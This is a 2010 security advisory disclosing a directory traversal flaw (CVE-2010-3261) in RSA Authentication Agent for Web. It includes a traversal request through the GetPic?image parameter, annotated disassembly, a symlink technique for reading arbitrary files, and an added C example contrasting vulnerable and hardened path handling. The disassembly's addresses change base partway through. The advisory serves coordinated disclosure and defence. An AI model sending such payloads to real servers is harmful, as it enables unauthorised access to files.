Portcullis Security Advisory 10-001

Vulnerable System:
RSA Authentication Agent for Web

Vulnerability Title:
mod_rsawebagent Is Vulnerable To Directory Traversal

Vulnerability discovery and development:
Portcullis Security Testing Services. Further research was then carried out and the vendor notified.

Credit for Discovery:
Tim Brown - Portcullis Computer Security Ltd.

Affected systems:
All known versions of RSA Authentication Agent for Web for Apache Web Server; the vulnerability was confirmed on mod_rsawebagent/7.0.0[315]. The vendor subsequently confirmed that both RSA Authentication Agent 7.0 for Web for Apache Web Server and RSA Authentication Agent 7.0 for Web for Internet Information Services are affected. The vendor was unable to reproduce this issue on older releases.

Details:
RSA Authentication Agent for Web for Apache Web Server allows you to protect all or selected web pages with RSA SecurID. The agent, residing on a web server, intercepts all user requests for protected web pages. When a user attempts to access a URL that RSA SecurID protects, the agent requests the username and passcode and passes them to RSA Authentication Manager for authentication. If the authentication is successful, the agent stores the information in a cookie in the user's browser. As long as the cookie remains valid, the user is granted access to protected web pages.
It is possible to pass a value in the GetPic?image parameter of requests to the web authentication URL handler which causes arbitrary files with the .jpg extension to be returned from outside the web root, as follows:

    GET /webauthentication?GetPic?image=../../../../../../../usr/share/cups/doc-root/images/smiley HTTP/1.0

The value of the parameter is first URL decoded and then used as an argument to snprintf with a format string of "%s/%s.%s" within the CHTMLString::GetDefaultTemplate method:

    CHTMLString::GetDefaultTemplate(char const*image, char const*arg1, unsigned int*root):
    0x00007f62edba638a <+0>:   mov %rbx,-0x30(%rsp)
    0x00007f62edba638f <+5>:   mov %rbp,-0x28(%rsp)
    0x00007f62edba6394 <+10>:  mov %r12,-0x20(%rsp)
    0x00007f62edba6399 <+15>:  mov %r13,-0x18(%rsp)
    0x00007f62edba639e <+20>:  mov %r14,-0x10(%rsp)
    0x00007f62edba63a3 <+25>:  mov %r15,-0x8(%rsp)
    0x00007f62edba63a8 <+30>:  sub $0x558,%rsp
    0x00007f62edba63af <+37>:  mov %rdi,%r14                ; set $r14 to $rdi (arg1)
    0x00007f62edba63b2 <+40>:  mov %rsi,%rbx                ; set $rbx to $rsi (image)
    0x00007f62edba63b5 <+43>:  mov %rdx,%r12                ; set $r12 to $rdx (root)
    0x00007f62edba63b8 <+46>:  mov %rcx,%r15                ; set $r15 to $rcx (arg3)
    0x00007f62edba63bb <+49>:  lea 0x20e69(%rip),%r8        ; set $r8 (arg4) to "Entering GetDefaultTemplate()"
    0x00007f62edba63c2 <+56>:  mov $0x486,%ecx              ; $ecx (arg3) = 1158
    0x00007f62edba63c7 <+61>:  lea 0x20dee(%rip),%rdx       ; set $rdx (arg2) to "genhtml.cpp"
    0x00007f62edba63ce <+68>:  mov $0x9,%esi                ; $esi (arg1) = 9
    0x00007f62edba63d3 <+73>:  mov $0x2,%edi                ; $edi (arg0) = 2
    0x00007f62edba63d8 <+78>:  mov $0x0,%eax                ; $eax = 0
    0x00007f62edba63dd <+83>:  callq 0x7f62edb7d818         ; SDTraceMessage(2, 9, "genhtml.cpp", 1158, "Entering GetDefaultTemplate()");
    0x00007f62edba63e2 <+88>:  lea 0x10(%rsp),%rbp          ; set $rbp to "" (the stack buffer that receives the path)
    0x00007f62edba63e7 <+93>:  mov 0x20(%r14),%r9           ; set $r9 (args2) to "jpg" (from arg1)
    0x00007f62edba63eb <+97>:  mov %rbx,%r8                 ; set $r8 (args1) to "../../../../../../../usr/share/cups/doc-root/images/smiley" (from image)
    0x00007f62edba63ee <+100>: mov %r12,%rcx                ; set $rcx (args0) to "/opt/apache2/rsawebagent/Templates" (from root)
    0x00007f62edba63f1 <+103>: lea 0x20eb6(%rip),%rdx       ; set $rdx (format) to "%s/%s.%s"
    0x00007f62edba63f8 <+110>: mov $0x400,%esi              ; $esi (size) = 1024
    0x00007f62edba63fd <+115>: mov %rbp,%rdi                ; set $rdi (str) to ""
    0x00007f62edba6400 <+118>: mov $0x0,%eax                ; $eax (nwritten) = 0
    => 0x00007f62edba6405 <+123>: callq 0x7f62edb7cee8      ; snprintf(str, 1024, "%s/%s.%s", "/opt/apache2/rsawebagent/Templates", "../../../../../../../usr/share/cups/doc-root/images/smiley", "jpg");
    0x00007f62edba640a <+128>: dec %eax                     ; $eax-- ($eax is now nwritten - 1)
    0x00007f62edba640c <+130>: cmp $0x3fe,%eax              ; compare $eax (nwritten - 1) with 1022
    0x00007f62edba6411 <+135>: jbe 0x7f62edba644f <_ZN11CHTMLString18GetDefaultTemplateEPKcS1_Pj+197> ; if $eax <= 1022 (unsigned) the path fitted: continue at +197
    0x00007fbb34042413 <+137>: movb $0x0,0x40f(%rsp)        ; 0x40f(%rsp) = 0 (otherwise: overflow path, terminate the buffer)
    0x00007fbb3404241b <+145>: mov %rbp,%r9                 ; set $r9 (args5) to $rbp (str)
    0x00007fbb3404241e <+148>: lea 0x213c3(%rip),%r8        ; set $r8 (arg4) to "Leaving GetDefaultTemplate(), buffer overflow for template %s"
    0x00007fbb34042425 <+155>: mov $0x492,%ecx              ; $ecx (arg3) = 1170
    0x00007fbb3404242a <+160>: lea 0x20d8b(%rip),%rdx       ; set $rdx (arg2) to "genhtml.cpp"
    0x00007fbb34042431 <+167>: mov $0x9,%esi                ; $esi (arg1) = 9
    0x00007fbb34042436 <+172>: mov $0x4,%edi                ; $edi (arg0) = 4
    0x00007fbb3404243b <+177>: mov $0x0,%eax                ; $eax = 0
    0x00007fbb34042440 <+182>: callq 0x7fbb34019818         ; SDTraceMessage(4, 9, "genhtml.cpp", 1170, "Leaving GetDefaultTemplate(), buffer overflow for template %s", "/opt/apache2/rsawebagent/Templates/../../../../../../usr/share/cups/doc-root/images/smiley.jpg");
    0x00007fbb34042445 <+187>: mov $0x0,%eax                ; $eax = 0
    ...

This results in /opt/apache2/rsawebagent/Templates/../../../../../../usr/share/cups/doc-root/images/smiley.jpg being returned. The path is then stat'd to confirm its existence before it is passed to CHTMLString::ReadTemplate, which opens, stats and then reads the file into freshly allocated memory.
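As an added illustration (not code from the advisory or from the vendor), the following C program mirrors the path construction shown in the disassembly, "%s/%s.%s" guarded only by the snprintf length check, and places a hardened handler beside it that allow-lists the decoded image name before it can reach the format string. The template root, buffer size and example request are taken from the advisory; the percent-decoder, the 64-character limit and the function names are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Template root and snprintf buffer size as seen in the advisory's disassembly. */
#define TEMPLATE_ROOT "/opt/apache2/rsawebagent/Templates"
#define TEMPLATE_BUF  1024

static int hexval(unsigned char c) {
    if (isdigit(c)) return c - '0';
    c = (unsigned char)tolower(c);
    return (c >= 'a' && c <= 'f') ? c - 'a' + 10 : -1;
}
/* Minimal in-place percent-decoder standing in for the agent's URL decoding step (assumed). */
void url_decode(char *s) {
    char *w = s;
    for (; *s; s++, w++) {
        if (*s == '%' && hexval((unsigned char)s[1]) >= 0 && hexval((unsigned char)s[2]) >= 0) {
            *w = (char)(hexval((unsigned char)s[1]) * 16 + hexval((unsigned char)s[2]));
            s += 2;
        } else *w = *s;
    }
    *w = '\0';
}

/* What GetDefaultTemplate does: "%s/%s.%s" guarded only by the length check that
   logs "buffer overflow for template"; nothing inspects the decoded value itself. */
int format_template_path(char *out, size_t outsz, const char *image, const char *ext) {
    int n = snprintf(out, outsz, "%s/%s.%s", TEMPLATE_ROOT, image, ext);
    return (n < 0 || (size_t)n >= outsz) ? -1 : 0;
}

/* Hardened check: a single filename component from an allow-listed charset, so no
   '/', '\\' or '.' can reach the format string however it was encoded on the wire. */
int is_safe_image_name(const char *image) {
    if (*image == '\0' || strlen(image) > 64) return 0;
    for (; *image; image++)
        if (!isalnum((unsigned char)*image) && *image != '-' && *image != '_') return 0;
    return 1;
}

/* Hypothetical GetPic?image= handler; hardened != 0 validates after decoding. */
int handle_getpic(const char *raw_param, int hardened, char *out, size_t outsz) {
    char image[TEMPLATE_BUF];
    if (strlen(raw_param) >= sizeof image) return -1;
    strcpy(image, raw_param);
    url_decode(image);                               /* decode first, as the agent does */
    if (hardened && !is_safe_image_name(image)) return -1;
    return format_template_path(out, outsz, image, "jpg");
}
```

With the advisory's request the unhardened handler happily yields a path that walks out of the Templates directory, while the hardened one rejects it and still serves an ordinary image name, percent-encoded or not.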
Note that no credentials are required to perform this attack. A user with access to the underlying host, either via a normal shell or, for example, by sftp, can extend this attack by creating a hard or symbolic link with the .jpg extension, pointing at any file accessible to the web server user, in any location to which they have write access, in order to read that file.

Interestingly, if $eax is greater than or equal to 1022 after the initial snprintf, the code detects this as a potential buffer overflow and logs an error before returning. At a guess, the code previously used sprintf, and this check was a primitive attempt to catch stack overflows.

In the process of researching this vulnerability, two further undocumented parameters, GetFile?file and GetStyleSheet?style, were identified which have the same issue. Whilst the former sounds useful, in practice it was determined that GetFile can only be used to access files with the .htm extension. Moreover, both undocumented parameters require valid credentials to access their functionality in the agent's default configuration.

Impact:
An attacker could cause access to arbitrary files.

Exploit:
Exploit code is not required.

Vendor status:
05/07/2010 - Vendor informed via email
07/07/2010 - Vendor responds confirming receipt and requesting further information about the platform on which the issue was discovered
14/07/2010 - Vendor confirms the issue and commits to provide an update in due course
30/07/2010 - Vendor suggests disclosure date of 20/09/2010
10/09/2010 - Vendor confirms disclosure date of 20/09/2010 and informs Portcullis that CVE-2010-3261 has been assigned to this issue
21/09/2010 - Vendor confirms they released the patch and advisory to their customers on 20/09/2010
22/09/2010 - Publication

Copyright:
Copyright © Portcullis Computer Security Limited 2010, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.